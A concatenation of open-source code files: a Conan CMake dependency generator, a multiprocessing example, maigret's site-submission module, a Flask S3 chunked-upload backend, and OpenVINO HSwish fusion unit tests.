set({{ pkg_name }}_COMPILE_DEFINITIONS{{ config_suffix }} {{ global_cpp.compile_definitions }})
set({{ pkg_name }}_COMPILE_OPTIONS_C{{ config_suffix }} {{ global_cpp.cflags_list }})
set({{ pkg_name }}_COMPILE_OPTIONS_CXX{{ config_suffix }} {{ global_cpp.cxxflags_list}})
set({{ pkg_name }}_LIB_DIRS{{ config_suffix }} {{ global_cpp.lib_paths }})
set({{ pkg_name }}_LIBS{{ config_suffix }} {{ global_cpp.libs }})
set({{ pkg_name }}_SYSTEM_LIBS{{ config_suffix }} {{ global_cpp.system_libs }})
set({{ pkg_name }}_FRAMEWORK_DIRS{{ config_suffix }} {{ global_cpp.framework_paths }})
set({{ pkg_name }}_FRAMEWORKS{{ config_suffix }} {{ global_cpp.frameworks }})
set({{ pkg_name }}_BUILD_MODULES_PATHS{{ config_suffix }} {{ global_cpp.build_modules_paths }})
set({{ pkg_name }}_BUILD_DIRS{{ config_suffix }} {{ global_cpp.build_paths }})
set({{ pkg_name }}_COMPONENTS{{ config_suffix }} {{ components_renames }})
{%- for comp_name, cpp in components_cpp %}
########### COMPONENT {{ comp_name }} VARIABLES #############################################
set({{ pkg_name }}_{{ comp_name }}_INCLUDE_DIRS{{ config_suffix }} {{ cpp.include_paths }})
set({{ pkg_name }}_{{ comp_name }}_LIB_DIRS{{ config_suffix }} {{ cpp.lib_paths }})
set({{ pkg_name }}_{{ comp_name }}_RES_DIRS{{ config_suffix }} {{ cpp.res_paths }})
set({{ pkg_name }}_{{ comp_name }}_DEFINITIONS{{ config_suffix }} {{ cpp.defines }})
set({{ pkg_name }}_{{ comp_name }}_OBJECTS{{ config_suffix }} {{ cpp.objects_list }})
set({{ pkg_name }}_{{ comp_name }}_COMPILE_DEFINITIONS{{ config_suffix }} {{ cpp.compile_definitions }})
set({{ pkg_name }}_{{ comp_name }}_COMPILE_OPTIONS_C{{ config_suffix }} "{{ cpp.cflags_list }}")
set({{ pkg_name }}_{{ comp_name }}_COMPILE_OPTIONS_CXX{{ config_suffix }} "{{ cpp.cxxflags_list }}")
set({{ pkg_name }}_{{ comp_name }}_LIBS{{ config_suffix }} {{ cpp.libs }})
set({{ pkg_name }}_{{ comp_name }}_SYSTEM_LIBS{{ config_suffix }} {{ cpp.system_libs }})
set({{ pkg_name }}_{{ comp_name }}_FRAMEWORK_DIRS{{ config_suffix }} {{ cpp.framework_paths }})
set({{ pkg_name }}_{{ comp_name }}_FRAMEWORKS{{ config_suffix }} {{ cpp.frameworks }})
set({{ pkg_name }}_{{ comp_name }}_DEPENDENCIES{{ config_suffix }} {{ cpp.public_deps }})
set({{ pkg_name }}_{{ comp_name }}_LINKER_FLAGS{{ config_suffix }}
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,SHARED_LIBRARY>:{{ cpp.sharedlinkflags_list }}>
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,MODULE_LIBRARY>:{{ cpp.sharedlinkflags_list }}>
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,EXECUTABLE>:{{ cpp.exelinkflags_list }}>
)
{%- endfor %}
""")
return ret
def get_global_cpp_cmake(self):
global_cppinfo = self.conanfile.cpp_info.copy()
global_cppinfo.aggregate_components()
pfolder_var_name = "{}_PACKAGE_FOLDER{}".format(self.pkg_name, self.config_suffix)
return DepsCppCmake(global_cppinfo, pfolder_var_name)
def get_required_components_cpp(self):
"""Returns a list of (component_name, DepsCppCMake)"""
ret = []
sorted_comps = self.conanfile.cpp_info.get_sorted_components()
direct_visible_host = self.conanfile.dependencies.filter({"build": False, "visible": True,
"direct": True})
for comp_name, comp in sorted_comps.items():
pfolder_var_name = "{}_PACKAGE_FOLDER{}".format(self.pkg_name, self.config_suffix)
deps_cpp_cmake = DepsCppCmake(comp, pfolder_var_name)
public_comp_deps = []
for require in comp.requires:
if "::" in require: # Points to a component of a different package
pkg, cmp_name = require.split("::")
req = direct_visible_host[pkg]
public_comp_deps.append("{}::{}".format(self.get_target_namespace(req),
self.get_component_alias(req, cmp_name)))
else: # Points to a component of same package
public_comp_deps.append("{}::{}".format(self.target_namespace,
self.get_component_alias(self.conanfile,
require)))
deps_cpp_cmake.public_deps = " ".join(public_comp_deps)
component_rename = self.get_component_alias(self.conanfile, comp_name)
ret.append((component_rename, deps_cpp_cmake))
ret.reverse()
return ret
def _get_dependency_filenames(self):
if self.conanfile.is_build_context:
return []
ret = []
direct_host = self.conanfile.dependencies.filter({"build": False, "visible": True,
"direct": True})
if self.conanfile.cpp_info.required_components:
for dep_name, _ in self.conanfile.cpp_info.required_components:
if dep_name and dep_name not in ret: # External dep
req = direct_host[dep_name]
ret.append(get_file_name(req, self.find_module_mode))
elif direct_host:
ret = [get_file_name(r, self.find_module_mode) for r in direct_host.values()]
return ret
class DepsCppCmake(object):
def __init__(self, cpp_info, pfolder_var_name):
def join_paths(paths):
"""
            Paths are double-quoted and escaped (except for spaces)
e.g: set(LIBFOO_INCLUDE_DIRS "/path/to/included/dir" "/path/to/included/dir2")
"""
ret = []
for p in paths:
norm_path = p.replace('\\', '/').replace('$', '\\$').replace('"', '\\"')
if os.path.isabs(p):
ret.append('"{}"'.format(norm_path))
else:
# Prepend the {{ pkg_name }}_PACKAGE_FOLDER{{ config_suffix }}
ret.append('"${%s}/%s"' % (pfolder_var_name, norm_path))
return "\n\t\t\t".join(ret)
def join_flags(separator, values):
# Flags have to be escaped
return separator.join(v.replace('\\', '\\\\').replace('$', '\\$').replace('"', '\\"')
for v in values)
def join_defines(values, prefix=""):
# Defines have to be escaped, included spaces
return "\n\t\t\t".join('"%s%s"' % (prefix, v.replace('\\', '\\\\').replace('$', '\\$').
replace('"', '\\"'))
for v in values)
def join_paths_single_var(values):
"""
semicolon-separated list of dirs:
e.g: set(LIBFOO_INCLUDE_DIR "/path/to/included/dir;/path/to/included/dir2")
"""
return '"%s"' % ";".join(p.replace('\\', '/').replace('$', '\\$') for p in values)
self.include_paths = join_paths(cpp_info.includedirs)
self.include_path = join_paths_single_var(cpp_info.includedirs)
self.lib_paths = join_paths(cpp_info.libdirs)
self.res_paths = join_paths(cpp_info.resdirs)
self.bin_paths = join_paths(cpp_info.bindirs)
self.build_paths = join_paths(cpp_info.builddirs)
self.src_paths = join_paths(cpp_info.srcdirs)
self.framework_paths = join_paths(cpp_info.frameworkdirs)
self.libs = join_flags(" ", cpp_info.libs)
self.system_libs = join_flags(" ", cpp_info.system_libs)
self.frameworks = join_flags(" ", cpp_info.frameworks)
self.defines = join_defines(cpp_info.defines, "-D")
self.compile_definitions = join_defines(cpp_info.defines)
        # For modern CMake targets we need to prepare a list so that we do not
        # lose elements when replacing " " with ";". Example: "-framework Foundation"
# Issue: #1251
self.cxxflags_list = join_flags(";", cpp_info.cxxflags)
self.cflags_list = join_flags(";", cpp_info.cflags)
# linker flags without magic: trying to mess with - and / =>
# https://github.com/conan-io/conan/issues/8811
# frameworks should be declared with cppinfo.frameworks not "-framework Foundation"
self.sharedlinkflags_list = join_flags(";", cpp_info.sharedlinkflags)
self.exelinkflags_list = join_flags(";", cpp_info.exelinkflags)
self.objects_list = join_paths(cpp_info.objects)
build_modules = cpp_info.get_property("cmake_build_modules", "CMakeDeps") or []
self.build_modules_paths = join_paths(build_modules)
|
py2.5/examples/ex_synchronize.py | geofft/multiprocess | 356 | 11195401 | #
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = processing.Value('i', TASKS)
mutex = processing.Lock()
for i in range(TASKS):
processing.Process(target=value_func, args=(running, mutex)).start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print running.value,
sys.stdout.flush()
mutex.release()
print
print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = processing.Queue()
p = processing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print o,
sys.stdout.flush()
except Empty:
print 'TIMEOUT'
print
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
print '\t' + str(cond)
time.sleep(2)
print '\tchild is notifying'
print '\t' + str(cond)
cond.notify()
cond.release()
def test_condition():
cond = processing.Condition()
p = processing.Process(target=condition_func, args=(cond,))
print cond
cond.acquire()
print cond
cond.acquire()
print cond
p.start()
print 'main is waiting'
cond.wait()
print 'main has woken up'
print cond
cond.release()
print cond
cond.release()
p.join()
print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print running.value, 'tasks are running'
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print '%s has finished' % processing.currentProcess()
mutex.release()
sema.release()
def test_semaphore():
sema = processing.Semaphore(3)
mutex = processing.RLock()
running = processing.Value('i', 0)
processes = [
processing.Process(target=semaphore_func, args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print '\tchild sleeping'
time.sleep(5.5)
print '\n\tchild terminating'
def test_join_timeout():
p = processing.Process(target=join_timeout_func)
p.start()
print 'waiting for process to finish'
while 1:
p.join(timeout=1)
if not p.isAlive():
break
print '.',
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print '\t%r is waiting' % processing.currentProcess()
event.wait()
print '\t%r has woken up' % processing.currentProcess()
def test_event():
event = processing.Event()
processes = [processing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print 'main is sleeping'
time.sleep(2)
print 'main is setting event'
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print 'Tests passed'
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', range(100)),
('d', [0.25 * i for i in range(100)]),
('H', range(1000))
]
shared_values = [processing.Value(id, v) for id, v in values]
shared_arrays = [processing.Array(id, a) for id, a in arrays]
p = processing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.getExitCode() == 0
####
def test(namespace=processing):
global processing
processing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print '\n\t######## %s\n' % func.__name__
func()
ignore = processing.activeChildren() # cleanup any old processes
if hasattr(processing, '_debugInfo'):
info = processing._debugInfo()
if info:
print info
raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
processing.freezeSupport()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print ' Using processes '.center(79, '-')
namespace = processing
elif sys.argv[1] == 'manager':
print ' Using processes and a manager '.center(79, '-')
namespace = processing.Manager()
namespace.Process = processing.Process
namespace.currentProcess = processing.currentProcess
namespace.activeChildren = processing.activeChildren
elif sys.argv[1] == 'threads':
print ' Using threads '.center(79, '-')
import processing.dummy as namespace
else:
print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
raise SystemExit, 2
test(namespace)
|
maigret/submit.py | noi4eg/maigret | 1,156 | 11195415 | import asyncio
import json
import re
from typing import List
import xml.etree.ElementTree as ET
import requests
from .activation import import_aiohttp_cookies
from .checking import maigret
from .result import QueryStatus
from .settings import Settings
from .sites import MaigretDatabase, MaigretSite, MaigretEngine
from .utils import get_random_user_agent, get_match_ratio
class Submitter:
HEADERS = {
"User-Agent": get_random_user_agent(),
}
SEPARATORS = "\"'"
RATIO = 0.6
TOP_FEATURES = 5
URL_RE = re.compile(r"https?://(www\.)?")
def __init__(self, db: MaigretDatabase, settings: Settings, logger):
self.settings = settings
self.db = db
self.logger = logger
@staticmethod
def get_alexa_rank(site_url_main):
url = f"http://data.alexa.com/data?cli=10&url={site_url_main}"
xml_data = requests.get(url).text
root = ET.fromstring(xml_data)
alexa_rank = 0
try:
alexa_rank = int(root.find('.//REACH').attrib['RANK'])
except Exception:
pass
return alexa_rank
@staticmethod
def extract_mainpage_url(url):
return "/".join(url.split("/", 3)[:3])
async def site_self_check(self, site, semaphore, silent=False):
changes = {
"disabled": False,
}
check_data = [
(site.username_claimed, QueryStatus.CLAIMED),
(site.username_unclaimed, QueryStatus.AVAILABLE),
]
self.logger.info(f"Checking {site.name}...")
for username, status in check_data:
results_dict = await maigret(
username=username,
site_dict={site.name: site},
logger=self.logger,
timeout=30,
id_type=site.type,
forced=True,
no_progressbar=True,
)
            # don't disable entries with other id types
# TODO: make normal checking
if site.name not in results_dict:
self.logger.info(results_dict)
changes["disabled"] = True
continue
result = results_dict[site.name]["status"]
site_status = result.status
if site_status != status:
if site_status == QueryStatus.UNKNOWN:
msgs = site.absence_strs
etype = site.check_type
self.logger.warning(
"Error while searching '%s' in %s: %s, %s, check type %s",
username,
site.name,
result.context,
msgs,
etype,
)
# don't disable in case of available username
if status == QueryStatus.CLAIMED:
changes["disabled"] = True
elif status == QueryStatus.CLAIMED:
self.logger.warning(
f"Not found `{username}` in {site.name}, must be claimed"
)
self.logger.info(results_dict[site.name])
changes["disabled"] = True
else:
self.logger.warning(
f"Found `{username}` in {site.name}, must be available"
)
self.logger.info(results_dict[site.name])
changes["disabled"] = True
self.logger.info(f"Site {site.name} checking is finished")
return changes
def generate_additional_fields_dialog(self, engine: MaigretEngine, dialog):
fields = {}
if 'urlSubpath' in engine.site.get('url', ''):
msg = (
                'The detected engine may use an additional URL subpath (/forum/, /blog/, etc). '
                'Enter it manually if it exists: '
)
subpath = input(msg).strip('/')
if subpath:
fields['urlSubpath'] = f'/{subpath}'
return fields
async def detect_known_engine(self, url_exists, url_mainpage) -> List[MaigretSite]:
try:
r = requests.get(url_mainpage)
self.logger.debug(r.text)
except Exception as e:
self.logger.warning(e)
print("Some error while checking main page")
return []
for engine in self.db.engines:
strs_to_check = engine.__dict__.get("presenseStrs")
if strs_to_check and r and r.text:
all_strs_in_response = True
for s in strs_to_check:
if s not in r.text:
all_strs_in_response = False
sites = []
if all_strs_in_response:
engine_name = engine.__dict__.get("name")
print(f"Detected engine {engine_name} for site {url_mainpage}")
usernames_to_check = self.settings.supposed_usernames
supposed_username = self.extract_username_dialog(url_exists)
if supposed_username:
usernames_to_check = [supposed_username] + usernames_to_check
add_fields = self.generate_additional_fields_dialog(
engine, url_exists
)
for u in usernames_to_check:
site_data = {
"urlMain": url_mainpage,
"name": url_mainpage.split("//")[1],
"engine": engine_name,
"usernameClaimed": u,
"usernameUnclaimed": "noonewouldeverusethis7",
**add_fields,
}
self.logger.info(site_data)
maigret_site = MaigretSite(
url_mainpage.split("/")[-1], site_data
)
maigret_site.update_from_engine(
self.db.engines_dict[engine_name]
)
sites.append(maigret_site)
return sites
return []
def extract_username_dialog(self, url):
url_parts = url.rstrip("/").split("/")
supposed_username = url_parts[-1].strip('@')
entered_username = input(
f'Is "{supposed_username}" a valid username? If not, write it manually: '
)
return entered_username if entered_username else supposed_username
async def check_features_manually(
self, url_exists, url_mainpage, cookie_file, redirects=False
):
custom_headers = {}
while True:
header_key = input(
'Specify custom header if you need or just press Enter to skip. Header name: '
)
if not header_key:
break
header_value = input('Header value: ')
custom_headers[header_key.strip()] = header_value.strip()
supposed_username = self.extract_username_dialog(url_exists)
non_exist_username = "noonewouldeverusethis7"
url_user = url_exists.replace(supposed_username, "{username}")
url_not_exists = url_exists.replace(supposed_username, non_exist_username)
headers = dict(self.HEADERS)
headers.update(custom_headers)
# cookies
cookie_dict = None
if cookie_file:
self.logger.info(f'Use {cookie_file} for cookies')
cookie_jar = import_aiohttp_cookies(cookie_file)
cookie_dict = {c.key: c.value for c in cookie_jar}
exists_resp = requests.get(
url_exists, cookies=cookie_dict, headers=headers, allow_redirects=redirects
)
self.logger.debug(url_exists)
self.logger.debug(exists_resp.status_code)
self.logger.debug(exists_resp.text)
non_exists_resp = requests.get(
url_not_exists,
cookies=cookie_dict,
headers=headers,
allow_redirects=redirects,
)
self.logger.debug(url_not_exists)
self.logger.debug(non_exists_resp.status_code)
self.logger.debug(non_exists_resp.text)
a = exists_resp.text
b = non_exists_resp.text
tokens_a = set(re.split(f'[{self.SEPARATORS}]', a))
tokens_b = set(re.split(f'[{self.SEPARATORS}]', b))
a_minus_b = tokens_a.difference(tokens_b)
b_minus_a = tokens_b.difference(tokens_a)
if len(a_minus_b) == len(b_minus_a) == 0:
print("The pages for existing and non-existing account are the same!")
top_features_count = int(
input(
f"Specify count of features to extract [default {self.TOP_FEATURES}]: "
)
or self.TOP_FEATURES
)
match_fun = get_match_ratio(self.settings.presence_strings)
presence_list = sorted(a_minus_b, key=match_fun, reverse=True)[
:top_features_count
]
print("Detected text features of existing account: " + ", ".join(presence_list))
features = input("If features was not detected correctly, write it manually: ")
if features:
presence_list = list(map(str.strip, features.split(",")))
absence_list = sorted(b_minus_a, key=match_fun, reverse=True)[
:top_features_count
]
print(
"Detected text features of non-existing account: " + ", ".join(absence_list)
)
features = input("If features was not detected correctly, write it manually: ")
if features:
absence_list = list(map(str.strip, features.split(",")))
site_data = {
"absenceStrs": absence_list,
"presenseStrs": presence_list,
"url": url_user,
"urlMain": url_mainpage,
"usernameClaimed": supposed_username,
"usernameUnclaimed": non_exist_username,
"checkType": "message",
}
if headers != self.HEADERS:
site_data['headers'] = headers
site = MaigretSite(url_mainpage.split("/")[-1], site_data)
return site
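    # Note (editorial addition): check_features_manually derives detection
    # features by fetching the page of a known-existing account and the page of
    # a placeholder account, splitting both responses on quote characters, and
    # diffing the token sets. Tokens unique to the existing-account response
    # become presence strings and tokens unique to the placeholder response
    # become absence strings, ranked by similarity to settings.presence_strings.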
async def dialog(self, url_exists, cookie_file):
domain_raw = self.URL_RE.sub("", url_exists).strip().strip("/")
domain_raw = domain_raw.split("/")[0]
self.logger.info('Domain is %s', domain_raw)
# check for existence
matched_sites = list(
filter(lambda x: domain_raw in x.url_main + x.url, self.db.sites)
)
if matched_sites:
print(
f'Sites with domain "{domain_raw}" already exists in the Maigret database!'
)
status = lambda s: "(disabled)" if s.disabled else ""
url_block = lambda s: f"\n\t{s.url_main}\n\t{s.url}"
print(
"\n".join(
[
f"{site.name} {status(site)}{url_block(site)}"
for site in matched_sites
]
)
)
if input("Do you want to continue? [yN] ").lower() in "n":
return False
url_mainpage = self.extract_mainpage_url(url_exists)
print('Detecting site engine, please wait...')
sites = []
try:
sites = await self.detect_known_engine(url_exists, url_mainpage)
except KeyboardInterrupt:
print('Engine detect process is interrupted.')
if not sites:
print("Unable to detect site engine, lets generate checking features")
sites = [
await self.check_features_manually(
url_exists, url_mainpage, cookie_file
)
]
self.logger.debug(sites[0].__dict__)
sem = asyncio.Semaphore(1)
print("Checking, please wait...")
found = False
chosen_site = None
for s in sites:
chosen_site = s
result = await self.site_self_check(s, sem)
if not result["disabled"]:
found = True
break
if not found:
print(
f"Sorry, we couldn't find params to detect account presence/absence in {chosen_site.name}."
)
print(
"Try to run this mode again and increase features count or choose others."
)
self.logger.debug(json.dumps(chosen_site.json))
return False
else:
if (
input(
f"Site {chosen_site.name} successfully checked. Do you want to save it in the Maigret DB? [Yn] "
)
.lower()
.strip("y")
):
return False
chosen_site.name = input("Change site name if you want: ") or chosen_site.name
chosen_site.tags = list(map(str.strip, input("Site tags: ").split(',')))
rank = Submitter.get_alexa_rank(chosen_site.url_main)
if rank:
print(f'New alexa rank: {rank}')
chosen_site.alexa_rank = rank
self.logger.debug(chosen_site.json)
site_data = chosen_site.strip_engine_data()
self.logger.debug(site_data.json)
self.db.update_site(site_data)
return True
|
example_backend.py | scottmberry/mule-uploader | 131 | 11195424 | from flask import Flask, request, render_template
from sqlalchemy import create_engine, Column, Integer
from sqlalchemy import String, DateTime, Text, MetaData
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from werkzeug import SharedDataMiddleware
from hashlib import sha1
from settings import DEBUG, AWS_ACCESS_KEY, AWS_SECRET, MIME_TYPE, BUCKET
from settings import ENGINE, PORT, CHUNK_SIZE, AWS_REGION
from urllib import quote
from datetime import datetime
import os
import hmac
import base64
import time
import json
import random
import hashlib
## The Upload DB Model
engine = create_engine(ENGINE, convert_unicode=True)
db = scoped_session(sessionmaker(
autocommit=False, autoflush=True, bind=engine))
Base = declarative_base()
Base.query = db.query_property()
metadata = MetaData()
class Upload(Base):
__tablename__ = 'upload'
id = Column(Integer, primary_key=True)
filename = Column(String(256))
filesize = Column(String(64))
last_modified = Column(String(64))
upload_start = Column(DateTime)
last_information = Column(DateTime)
key = Column(String(256))
upload_id = Column(String(128))
chunks_uploaded = Column(Text)
Upload.metadata.create_all(bind=engine)
## Boilerplate
app = Flask(__name__)
app.debug = DEBUG
def init_db():
metadata.create_all(bind=engine)
init_db()
@app.teardown_request
def teardown_db(exception=None):
db.remove()
## Helper Functions
def _sign(key, msg):
return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()
def _get_signature_key(key, date_stamp, region_name, service_name):
k_date = _sign(("AWS4" + key).encode("utf-8"), date_stamp)
k_region = _sign(k_date, region_name)
k_service = _sign(k_region, service_name)
k_signing = _sign(k_service, "aws4_request")
return k_signing
def get_signature(date):
return _get_signature_key(
AWS_SECRET, date.strftime("%Y%m%d"), AWS_REGION, "s3").encode('hex')
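# Editorial note: get_signature derives an AWS Signature Version 4 signing key
# by chaining HMAC-SHA256 over the date stamp, region, service name ("s3") and
# the literal "aws4_request", then hex-encodes it for the browser-side
# uploader. A minimal sketch (the date value is an arbitrary example):
#
#   key_hex = get_signature(datetime(2016, 1, 1))
#   # -> hex signing key scoped to 20160101/<AWS_REGION>/s3/aws4_request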
## Actual backend
@app.route("/upload-backend/signing_key/")
def signing_key():
date = datetime.utcnow()
key = get_signature(date)
filename = request.args['filename']
filesize = request.args['filesize']
last_modified = request.args['last_modified']
data = {
"date": date.isoformat() + 'Z',
"signature": key,
"access_key": AWS_ACCESS_KEY,
"region": AWS_REGION,
"bucket": BUCKET,
"backup_key": str(random.randint(1, 1000000)),
"content_type": MIME_TYPE,
}
try:
assert 'force' not in request.args
u = db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).first()
assert u
data.update({
"key": u.key,
"upload_id": u.upload_id,
"chunks": map(int, u.chunks_uploaded.split(',')),
})
except AssertionError:
db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).delete()
db.commit()
return json.dumps(data)
@app.route("/upload-backend/chunk_loaded/")
def upload_action():
key = request.args.get('key')
upload_id = request.args.get('upload_id')
filename = request.args['filename']
filesize = request.args['filesize']
last_modified = request.args['last_modified']
chunk = int(request.args['chunk'])
if filesize > CHUNK_SIZE:
try:
u = db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).first()
assert u
chunks = set(map(int, u.chunks_uploaded.split(',')))
chunks.add(chunk)
u.chunks_uploaded = ','.join(map(str, chunks))
db.commit()
except AssertionError:
u = Upload(
filename=filename,
filesize=filesize,
last_modified=last_modified,
chunks_uploaded=str(chunk),
key=key,
upload_id=upload_id,
)
db.add(u)
db.commit()
return ''
## Static files (debugging only)
@app.route("/")
def index():
return render_template('index.html', aws_access_key=AWS_ACCESS_KEY,
mime_type=MIME_TYPE, bucket=BUCKET,
region=AWS_REGION,
key=str(random.randint(1, 1000000)))
if app.debug:
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/': os.path.join(os.path.dirname(__file__), '')
})
if __name__ == "__main__":
app.run(host='0.0.0.0', port=PORT)
|
tools/mo/unit_tests/mo/front/HSwish_fusing_test.py | ryanloney/openvino-1 | 1,127 | 11195431 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from openvino.tools.mo.front.HSwish_fusion import HSwishWithClamp, HSwishWithMinMax
from openvino.tools.mo.front.common.partial_infer.utils import float_array
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph, const, regular_op, result, build_graph_with_edge_attrs
ref_nodes = {**regular_op('input', {'type': 'Parameter'}),
**regular_op('hswish', {'type': 'HSwish', 'name': 'final_mul'}),
**result('result')
}
ref_edges = [('input', 'hswish'), ('hswish', 'result')]
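# The test graphs below encode the hard-swish decomposition
#   HSwish(x) = x * clamp(x + 3, 0, 6) * (1/6),
# expressed either with a single Clamp node (HSwishWithClamp) or with a
# Maximum/Minimum pair (HSwishWithMinMax). The fusing transformations are
# expected to collapse either subgraph into one HSwish operation that keeps
# the name of the final multiplication.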
class HSwishWithClampTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('relu6', {'op': 'Clamp'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}
edges = [('input', 'mul', {'in': 0, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'relu6', {'in': 0, 'out': 0}),
('const_0', 'relu6', {'in': 1, 'out': 0}),
('const_6', 'relu6', {'in': 2, 'out': 0}),
('relu6', 'mul', {'in': 1, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_hswish_with_clamp(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'HSwish')
def test_hswish_with_clamp_wrong_constant(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {'const_0': {'value': float_array([0.00001])}})
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_hswish_with_clamp_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('relu6', {'op': 'Clamp'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}, [('input', 'mul', {'in': 0, 'out': 0}),
('input_2', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'relu6', {'in': 0, 'out': 0}),
('const_0', 'relu6', {'in': 1, 'out': 0}),
('const_6', 'relu6', {'in': 2, 'out': 0}),
('relu6', 'mul', {'in': 1, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})])
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
class HSwishWithMinMaxTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('max', {'op': 'Maximum'}),
**regular_op('min', {'op': 'Minimum'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}
edges = [('input', 'mul', {'in': 1, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'max', {'in': 0, 'out': 0}),
('const_0', 'max', {'in': 1, 'out': 0}),
('max', 'min', {'in': 0, 'out': 0}),
('const_6', 'min', {'in': 1, 'out': 0}),
('min', 'mul', {'in': 0, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_hswish_with_min_max(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'HSwish')
def test_hswish_with_min_max_wrong_constant(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {'const_0': {'value': float_array([0.00001])}})
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
